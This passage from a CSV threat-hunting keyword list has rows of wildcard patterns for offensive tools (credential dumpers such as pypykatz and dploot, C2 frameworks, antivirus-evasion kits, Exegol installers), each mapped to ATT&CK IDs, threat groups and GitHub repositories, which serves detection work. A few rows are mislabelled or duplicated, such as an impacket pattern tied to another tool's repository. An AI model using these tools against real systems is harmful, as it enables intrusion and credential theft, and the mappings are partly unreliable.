T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*InlineShellcode*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*InlineWhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*InlineWhispers2*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*Input line too long.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*input/shellcode_enc_raw.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*input/shellcode_raw.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*ins1gn1a/Frampton*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*InsecurePowerShell*","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","1","98","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z" +"*insecurityofthings*jackit*","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","756","138","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" +"*insert_top_100_passwords_1_G*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InsidePro-PasswordsPro.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InspectAssembly.csproj*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*InspectAssembly.exe*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*install powershell-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*install * roadrecon*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*install amass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*install bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*install c2tc-domaininfo*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*install cdn-proxy*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*install certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*install coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*--install -d kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl installation","N/A","N/A","N/A","N/A","N/A","N/A" +"*install dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*install gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*install h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*install hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*install hping3*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*install hydra-gtk*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*install impacket*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*install Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*install macchanger*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*install p0f*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*install pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*install proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*install pyinstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*install pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*install s3scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*install samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" +"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*install snmpcheck*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*install tor deb.torproject.org-keyring*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*install tshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*install udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*install wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*install_aclpwn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ad_apt_tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_adidnsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_amber*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound-import*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound-py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_bloodhound-quickwin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_certipy*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_certsync*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_coercer*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_crackhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_cracking_apt_tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_crackmapexec*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_cypheroth*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_darkarmour*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_dfscoerce*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_donpapi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_enum4linux-ng*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_enyx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - 